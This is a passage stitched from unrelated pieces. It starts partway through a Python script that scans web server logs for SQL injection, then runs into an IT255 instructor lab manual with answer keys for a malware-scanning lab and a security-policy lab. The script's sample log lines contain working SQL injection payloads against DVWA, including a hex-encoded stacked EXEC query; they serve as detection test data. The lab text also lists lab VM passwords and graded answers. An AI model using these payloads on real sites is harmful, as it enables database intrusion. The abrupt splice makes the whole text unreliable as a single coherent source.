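    '?id=a%27+ORDER+BY+3%3B%23&Submit=Submit HTTP/1.1" 200 1512',
    '10.0.0.9 - - [08/Mar/2013:10:15:07 -0500] "GET /dvwa/vulnerabilities/sqli/'
    '?id=1%3BDECLARE+%40S+VARCHAR%284000%29%3BSET+%40S%3DCAST%280x' + _HEX_PAYLOAD +
    '+AS+VARCHAR%284000%29%29%3BEXEC%28%40S%29%3B--&Submit=Submit HTTP/1.1" 200 1512',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], ",".join(f["rules"]), "->", f["decoded"])
```

Feed it real lines with `scan_log(open("/var/log/apache2/access.log").read().splitlines())`; POSTed form bodies are not in the access log, so for those the same rules need to run on a request-body capture instead.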
Laboratory #9

Lab #9: Perform a Virus Scan and Malware Identification Scan and Eliminate Threats

Learning Objectives and Outcomes

Upon completing this lab, students will be able to complete the following tasks:
- Identify the risks associated with viruses, malware, and malicious software on a Windows Server
- Apply security countermeasures to mitigate the risk caused by viruses, malware, and malicious software
- Enable AVG as an anti-virus, malware, and malicious software security countermeasure on a Windows Server
- Disable unnecessary services in a Windows workstation and manually baseline enabled processes
- Configure a Windows workstation internal firewall to block future malware infections from penetrating the system

Required Setup and Tools

This lab does not require the use of the ISS Mock IT Infrastructure (Cisco core backbone network). In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and isolated on a dedicated layer 2 switch. This allows a shared DHCP server to allocate the IP addresses for the instructor and student workstations.

The following is required for this hands-on lab:
A) A classroom workstation (with at least 4 GB RAM) capable of supporting an insertable hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation/server will support the virtualized server farm connected to the classroom layer 2 switch.
B) An instructor workstation (with at least 2 GB RAM) that acts as the instructor's demo lab workstation. The instructor will display the Instructor workstation on the LCD projector to demo the loading and configuring of the ITT Mock IT Infrastructure and Server Farm with VMware Player.
C) Students' lab workstations will use a local copy of the ITT Mock IT Infrastructure Server Farm on a local or USB hard drive with VMware Player to run their Student and Target VMs.

The following summarizes the setup, configuration, and equipment needed to perform Lab #9:
1. A virtualized server farm with:
   a. Microsoft DHCP server for allocating student IP host addresses
   b. A Student and/or Instructor VM workstation with Internet Explorer
2. Target VMs as described by the lab:
   a. Windows 2003 Server Target VM 01
   b. AVG Antivirus and IZarc Archiver
   - Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
     o Computer Name: Windows02
     o Three users available: administrator, instructor or student (case sensitive)
     o Password: ISS316Security
     o IP Address: DHCP
     o Domain Login: NO
   - FTP (Filezilla FTP Server)
     o Port: 21
     o Username: instructor or student
     o Password:
   - TFTP (Tftpd32 TFTP Server)
     o Port: 69
     o Username:
     o Password:
3. Standard ITT ISS onsite student workstation must have the following software applications loaded to perform this lab:
   a. VMware Player 3.x
   b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers

Recommended Procedures

Instructor Demo Lab #9: The instructor will discuss the risks and threats caused by viruses, Trojans, worms, malware, and malicious software. Then he/she will demonstrate using AVG Anti-virus protection for Windows to identify malware found on a compromised system. The instructor will also demonstrate how to disable unnecessary services in Windows (i.e., applications & processes, etc.) and configure the Windows Server internal firewall for enhanced security and protection against threats from malware.

Hands-on Lab #9 Instructor Steps:

The instructor will perform the following demonstration using VMware Player:
1. Connect the instructor removable hard drive to the dedicated Instructor workstation.
2. Power up and log into your Instructor VM and TargetWindows01 VM. Obtain an IP address from the DHCP server on the classroom layer 2 switch.
   Note: Remember that if you only have 2 GB RAM, you can power on two VMs simultaneously to run this hands-on lab: the Instructor VM and the TargetWindows01 VM server.
3. Connect the LCD projector to the Instructor workstation and project onto the screen for the students to view your demonstration.
4. Power up and log into the Instructor VM and TargetWindows01 VM:
   a. Login ID: instructor or student (case sensitive)
   b. Password: ISS316Security (case sensitive)
5. On the TargetWindows01 VM, make sure the prodrev.zip file is on the desktop. This is an encrypted zip file with a password.
6. Click on the AVG Free 9 icon on your desktop and perform an update by clicking on Update Now. No Internet access will be available, but before scanning any file this should be the first step.
7. Next click on Computer Scanner and, for now, pick the "Scan specific files or folders" option and select the desktop to be scanned. Then click the Start Scan option.
8. This scan will return no infected files, given that encrypted files cannot be opened for scanning by anti-virus software.
9. Open the prodrev.zip file now using IZarc archiver by right-clicking the file and clicking the Extract Here option. (See Screen 3)
10. Enter the file's decryption password (password123) and you should now see a PDF file on the desktop named productreview.pdf.
11.
    Repeat Step 4 in AVG, and it should pick up a malicious "virus found" exploit; look at the scan results for the most recent scan.
12. Disable unneeded services in your Student VM workstation:
   a. Right-click My Computer and click Manage.
   b. Click on Services from the left-side tree menu.
   c. Select the desired service, open the context menu, and select Properties.
   d. Change Startup Type to Manual or Disabled, then choose OK.
   [Figure 14: Disable Windows Service]
13. Document all services that are disabled.
14. Launch Windows Firewall: Start -> Administrative Tools -> Windows Firewall.
15. Click Advanced.
16. Identify the default ICMP settings for the internal Windows Server firewall in your Student VM workstation.

Hands-on Lab #9 Student Steps:

Students should perform the following steps:
1. Connect the student removable hard drive to your workstation.
2. Power up and log into your Student VM and TargetWindows01 VM. Obtain an IP address from the DHCP server on the classroom layer 2 switch.
   Note: Remember that if you only have 2 GB RAM, you can power on two VMs simultaneously to run this hands-on lab: the Student VM and the TargetWindows01 VM server.
3. Power up and log into the Instructor VM and TargetWindows01 VM:
   a. Login ID: student (case sensitive)
   b. Password: ISS316Security (case sensitive)
4. On the TargetWindows01 VM, make sure the prodrev.zip file is on the desktop. This is an encrypted zip file with a password.
5. Click on the AVG Free 9 icon on your desktop and perform an update by clicking on Update Now. No Internet access will be available, but before scanning any file this should be the first step.
6. Next click on Computer Scanner and, for now, pick the "Scan specific files or folders" option and select the desktop to be scanned. Then click the Start Scan option.
7. This scan will return no infected files, given that encrypted files cannot be opened for scanning by anti-virus software.
8. Open the prodrev.zip file now using IZarc archiver by right-clicking the file and clicking the Extract Here option. (See Screen 3)
9. Enter the file's decryption password (password123), and you should now see a PDF file on the desktop named productreview.pdf.
10. Repeat Step 4 in AVG, and it should pick up a malicious "virus found" exploit; look at the scan results for the most recent scan.
11. Disable unneeded services in your Student VM workstation:
   a. Right-click My Computer and click Manage.
   b. Click on Services from the left-side tree menu.
   c. Select the desired service, open the context menu, and select Properties.
   d. Change Startup Type to Manual or Disabled, then choose OK.
   [Figure 14: Disable Windows Service]
12. Document all services that are disabled.
13. Launch Windows Firewall: Start -> Administrative Tools -> Windows Firewall.
14. Click Advanced.
15. Identify the default ICMP settings for the internal Windows Server firewall in your Student VM workstation.

Deliverables

Upon completion of this lab, students are required to provide the following deliverables:
1. Lab #9: Students should provide a document, in Microsoft Word format, containing the following information:
   - A description of any identified unneeded services running on the Student VM workstation, along with a description of the suggested action that should be taken to secure each service.
A description of at least three ICMP firewall rules that can be changed on the Student VM workstation to enhance C-I-A A screenshot of their PDF submission to Virus Total of the malicious PDF 2. Lab #9 Lab Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #9 that the students must perform: 1. Was the student able to identify the risks associated with viruses, malware, and malicious software on a Windows Server? [20%] 2. Was the student able to apply security countermeasures to mitigate the risk caused by viruses, malware, and malicious software? [20%] 3. Was the student able to enable AVG as an anti-virus, malware, and malicious software security countermeasure on a Windows Server? [20%] 4. Was the student able to disable unnecessary services in a Windows workstation and manually baseline enable processes? [20%] 5. Was the student able to configure a Windows workstation internal firewall to block future malware infections from penetrating the system? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -112- IT255 Instructor Lab Manual LABORATORY Lab #9 Assessment Worksheet Perform a Virus Scan and Malware Identification Scan and Eliminate Threats Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview In this lab the students learn how to use AVG Anti-virus for Windows to identify malware found on a compromised system. They will also examine the services enabled in their Windows workstation and disable unnecessary applications and processes. 
The lab closes with a review of the default configuration of the Windows workstation's internal firewall.

LAB Assessment Questions & Answers
1. What is the main difference between a Trojan and a Virus?
A Trojan is malware disguised as, or hidden inside, a program the user wants; it does not replicate on its own but relies on the user choosing to install or run it. A virus attaches itself to other files or programs and replicates each time an infected host is executed, spreading to further files and systems without any further user decision.
2. A virus or malware can impact which of the three tenets of information systems security, C-I-A? Describe how it impacts it as well.
Availability is the tenet this lab demonstrates: viruses and malware consume CPU, memory and bandwidth, slow applications, and can corrupt or lock files, reducing a user's ability to reach applications and data. Malware also threatens confidentiality (spyware and keyloggers exfiltrate data) and integrity (a Trojan or rootkit alters files, configurations or logs), so all three tenets are at risk.
3. Once a file is found malicious on your computer, what are the default settings for USB/removable device scanning? What should an organization do regarding use of USB hard drives and slots on existing computers and devices?
Automatic scanning of removable media is usually off by default and must be enabled, typically under Scans > Removable Device Detection (or the equivalent) in the anti-virus product. The Acceptable Use Policy (AUP) should state what may and may not be inserted into organization-owned IT assets (computers, workstations, laptops, desktops, etc.).
Anti-virus with automatic scanning of any inserted media should be enabled, so that removable media does not become an unmonitored path for malware onto the organization's computers.
4. Why is it recommended to do an anti-virus signature file update before performing an anti-virus scan on your computer?
New malware is discovered every day, and anti-virus vendors release signature updates at least several times per week. To have coverage of the most recent malware, update the signature files immediately before running a system scan; a scan with stale signatures misses anything released since the last update.
5. When sending a file, a user asks you to zip it and encrypt the file if possible. Why would this be?
A password-protected archive cannot be opened by the anti-virus engine on the mail gateway or on the recipient's computer, so its contents are never inspected. The attachment is therefore delivered as-is unless a mail filtering rule blocks encrypted zip files outright. The same property lets an attacker smuggle a malicious payload past scanners, as step 7 of this lab demonstrated, which is why such a rule is common.
6. You receive an e-mail containing a link from one of your friends about some special documents; shortly afterwards you receive the same e-mail from three other friends, and the e-mails are not being blocked. What is the likely cause?
This is typical of a phishing lure spread by malware: your friends' accounts or computers have been compromised, and the malware mails the same link to everyone in their address books, which is why it arrives from several trusted senders and passes filters that key on the sender. Once you click the link it downloads a piece of malware onto your machine, which may repeat the process from your account and possibly mutate to evade detection.
7. Specify a setting you would want to turn on if you were running AVG on your system to improve the quality of the scans you do on the system.
Enable heuristic detection, ensure that the contents of zip files are opened and scanned, automate signature updates, and schedule scans to run automatically.
8. Your employees e-mail file attachments to each other and externally through the organization's firewall and Internet connection. What security countermeasures can you implement to help mitigate the risk of rogue e-mail attachments and URL web links?
Security awareness training.
Acceptable Use Policy.
E-mail quarantine and filtering system.
E-mail attachment IDS/IPS and filtering.
Isolate/quarantine e-mails with unknown attachments or embedded URL links.
Test and validate the integrity of the e-mail attachment prior to releasing it from quarantine.
9. What are typical indicators that your computer system is compromised?
a. Degraded performance
b. Unusual network services
c. Missing system logs
d. Anti-virus not running
e. Application anomalies
10. What elements are needed in a Workstation Domain policy regarding use of anti-virus and malicious software prevention tools?
Which anti-virus and malicious software prevention tools to use on which platform.
Standardized configurations and settings based on the organization-wide security policy definition.
A layered security strategy that first mitigates the threat as it enters the IT infrastructure (e.g., LAN-to-WAN Domain IDS/IPS, e-mail filtering/quarantining) and then mitigates it at the last mile, the workstation or computer itself.
Frequency of anti-virus and malicious software prevention tool updates, and automation of those updates.

Laboratory #10
Lab #10: Craft an Information Systems Security Policy

Learning Objectives and Outcomes
Upon completing this lab, students will be able to complete the following tasks:
Define the policy definition for expected behavior by users, system administrators, management, and security personnel through the use of proper information security policy writing skills
Define and authorize the consequences of violations of an information security policy by properly documenting them in that security policy
Define the company's consensus baseline stance on security regarding a specific issue or process and how it should be handled
Minimize risk for the company by properly documenting and proactively addressing potential security needs or scenarios
Track compliance with regulations and legislation by providing a framework for best practice that can be followed by all employees

Required Setup and Tools
This is a paper-based, hands-on lab and does not require the use of the ISS Mock IT Infrastructure or Virtualized Server Farm.
The following summarizes the setup, configuration, and equipment needed to perform Lab #10:
1. The standard ITT ISS onsite student workstation must have the following software applications loaded to perform this lab:
   a. Microsoft Office 2007 or higher, for the Assessment Worksheet Questions & Answers and for reviewing and drafting the Information Security Policy Templates made available by SANS.org: http://www.sans.org/security-resources/policies/

Recommended Procedures
Instructor Demo Lab #10:
The instructor will lead a classroom discussion on what a policy is and what an IT security policy framework is. Policies, standards, procedures, and guidelines will be defined, as well as an overall policy framework for information systems security. Information systems security policies describe the organization's definition of an enterprise-wide policy and how the organization's IT assets and intellectual property are to be handled and protected. The instructor will show students what an IT security policy road-map looks like and will show examples on the SANS Institute website for discussion.

Hands-on Lab #10 Instructor Steps:
The instructor will lead a classroom discussion on the needs and requirements for defining an information systems security policy and policy framework:
1. Discuss the importance of information security policy writing and how policies differ from standards, procedures, and guidelines.
2. Discuss some of the most commonly used information security policies and, if possible, show and review whatever existing policies are in place at ITT-Tech.
3. Browse to SANS.org at the following link and open for review the document with a recommended Security Policy Roadmap - Process for Creating Security Policies: http://www.sans.org/reading_room/whitepapers/policyissues/security-policy-roadmapprocesscreating-security-policies_494
4. Focus on the main sections of Section 4 Information Gathering:
   a. Identify Assets
   b. Identify Vulnerabilities and Threats
   c. Evaluation of Measures and Controls
5. Review the main sections in Section 7 Writing Policy:
   a. Securing Hardware, Peripherals And Other Equipment
   b. Controlling Access To Information And Systems
   c. Purchasing And Maintaining Commercial Software
   d. Developing And Maintaining In-House Software
   e. Combating Cyber Crime
   f. Complying With Legal And Policy Requirements
   g. Planning For Business Continuity
   h. Addressing Personnel Issues Relating To Security
   i. Controlling E-Commerce Information Security
   j. Delivering Training And Staff Awareness
   k. Dealing With Premises Related Considerations
   l. Detecting And Responding To IS Incidents
   m. Classifying Information And Data
6. Browse to SANS.org at the following link and open for review the document with a recommended Information Security Policy Development Guide for Large and Small Companies: http://www.sans.org/reading_room/whitepapers/policyissues/information-securitypolicydevelopment-guide-large-small-companies_1331
7. Review the main sections in Section 8 Policy Development Lifecycle:
   a. Senior Management Buy-in
   b. Determine a Compliance Grace Period
   c. Determine Resource Involvement
   d. Review Existing Policy
   e. Determine Research Materials
   f. Interview SMEs
   g. Write Initial Draft
   h. Style Considerations
   i. Review Cycles
   j. Review with Additional Stakeholders
   k. Policy Gap Identification Process
   l. Develop Communication Strategy
   m. Publish
   n. Activate Communication Strategy
   o. Regularly Review and Update
8. Review the main sections in Section 9 Policy Document Outline:
   a. Introduction
   b. Purpose
   c. Scope
   d. Roles and Responsibilities
   e. Sanctions and Violations
   f. Revisions and Updating Schedule
   g. Contact Information
   h. Definitions/Glossary
   i. Acronyms
9. Navigate with your browser to the SANS Security Policy Project web page, http://www.sans.org/security-resources/policies/, scroll to the bottom of the page, and review the available templates for Information Security Policies. Explain to the students that they will need to pick out a template of their choice and fill out an Information Security Policy based on the fictitious company discussed in Lab #6: Business Continuity Planning.

Hands-on Lab #10 Student Steps:
Students should perform the following steps:
1. Research the importance of information security policy writing and how policies differ from standards, procedures, and guidelines.
2. Research some of the most commonly used information security policies and, if possible, review whatever existing policies are in place at ITT-Tech.
3. Browse to SANS.org at the following link and open for review the document with a recommended Security Policy Roadmap - Process for Creating Security Policies: http://www.sans.org/reading_room/whitepapers/policyissues/security-policy-roadmapprocesscreating-security-policies_494
4. Review the main sections of Section 4 Information Gathering:
   a. Identify Assets
   b. Identify Vulnerabilities and Threats
   c. Evaluation of Measures and Controls
5. Review the main sections in Section 7 Writing Policy:
   a. Securing Hardware, Peripherals And Other Equipment
   b. Controlling Access To Information And Systems
   c. Purchasing And Maintaining Commercial Software
   d. Developing And Maintaining In-House Software
   e. Combating Cyber Crime
   f. Complying With Legal And Policy Requirements
   g. Planning For Business Continuity
   h. Addressing Personnel Issues Relating To Security
   i. Controlling E-Commerce Information Security
   j. Delivering Training And Staff Awareness
   k. Dealing With Premises Related Considerations
   l. Detecting And Responding To IS Incidents
   m. Classifying Information And Data
6. Browse to SANS.org at the following link and open for review the document with a recommended Information Security Policy Development Guide for Large and Small Companies: http://www.sans.org/reading_room/whitepapers/policyissues/information-securitypolicydevelopment-guide-large-small-companies_1331
7. Review the main sections in Section 8 Policy Development Lifecycle:
   a. Senior Management Buy-in
   b. Determine a Compliance Grace Period
   c. Determine Resource Involvement
   d. Review Existing Policy
   e. Determine Research Materials
   f. Interview SMEs
   g. Write Initial Draft
   h. Style Considerations
   i. Review Cycles
   j. Review with Additional Stakeholders
   k. Policy Gap Identification Process
   l. Develop Communication Strategy
   m. Publish
   n. Activate Communication Strategy
   o. Regularly Review and Update
8. Review the main sections in Section 9 Policy Document Outline:
   a. Introduction
   b. Purpose
   c. Scope
   d. Roles and Responsibilities
   e. Sanctions and Violations
   f. Revisions and Updating Schedule
   g. Contact Information
   h. Definitions/Glossary
   i. Acronyms
9. Navigate with your browser to the SANS Security Policy Project web page, http://www.sans.org/security-resources/policies/, scroll to the bottom of the page, and review the available templates for Information Security Policies. Pick out an information security policy template and fill it out based on the fictitious company discussed in Lab #6: Business Continuity Planning.
Deliverables
Students are required to provide the following deliverables as part of Lab #10: Craft an Information Systems Security Policy:
1. Lab #10 Written Information Systems Security Policy, based on one of the templates provided by the SANS Institute, for the fictitious company introduced in Lab #6: Business Continuity Planning
2. Lab #10 Lab Assessment Questions & Answers

Evaluation Criteria and Rubrics
The following are the evaluation criteria and rubrics for Lab #10 that the students must perform:
1. Was the student able to define the policy definition for expected behavior by users, system administrators, management, and security personnel through the use of proper information security policy writing skills? [50%]
2. Was the student able to define and authorize the consequences of violations of an information security policy by properly documenting them in that security policy? [10%]
3. Was the student able to define the company's consensus baseline stance on security regarding a specific issue or process and how it should be handled? [10%]
4. Was the student able to mitigate risk for the company by properly documenting and proactively addressing potential security needs or scenarios? [20%]
5. Was the student able to track compliance with regulations and legislation by providing a framework for best practice that can be followed by all employees? [10%]

Lab #10 Assessment Worksheet
Craft an Information Systems Security Policy
Course Name & Number: ______________________________________________________________
Student Name: _______________________________________________________________________
Instructor Name: _____________________________________________________________________
LAB Due Date: _______________________________________________________________________

Overview
The students will research the benefits of writing and maintaining information security policies, which help to ensure that risk is minimized and that any security incidents are responded to effectively. An information security policy defines the organization's attitude to information, and announces internally and externally that information is an asset, the property of the organization, and is to be protected from unauthorized access, modification, disclosure, and destruction. The instructor will also guide the students through the Security Policy Roadmap and Development Guides provided by the SANS Institute and determine what type of information security policy they will be writing for their fictitious organization.

Lab Assessment Questions & Answers
1. What is a Policy? Give an example of an information systems security policy.
A policy is a written document that defines specific requirements or rules that must be met. In the information/network security realm, policies are usually point-specific, covering a single area. For example, an "Acceptable Use" policy covers the rules and regulations for appropriate use of the computing facilities.
2. What is a Standard? Give an example of an information systems security standard.
A standard is a collection of system-specific or procedure-specific requirements that applies organization-wide to help ensure C-I-A. For example, a data classification standard defines how the different types of data are to be handled throughout the organization.
3. What is a Guideline?
A guideline sets out recommended ways of implementing a policy and its standards and procedures. Guidelines are suggestions for implementation and are not mandatory.
4. Name 5 different sample policy templates available from the SANS Institute.
Any five of the following, for example:
Acceptable Encryption Policy
Acceptable Use Policy
Anti-Virus Process
Application Service Provider Policy
Audit Vulnerability Scanning Policy
Automatically Forwarded Email Policy
DMZ Lab Security Policy
5. Give an example of a sanction or violation that can be imposed on an employee who breaches an information security policy.
The students should come up with their own sanction and be able to explain why it is an appropriate remedy that will discourage other employees from committing the same violation in the future.
6. Submit your written policy using one of the policy templates you downloaded from the SANS Institute website.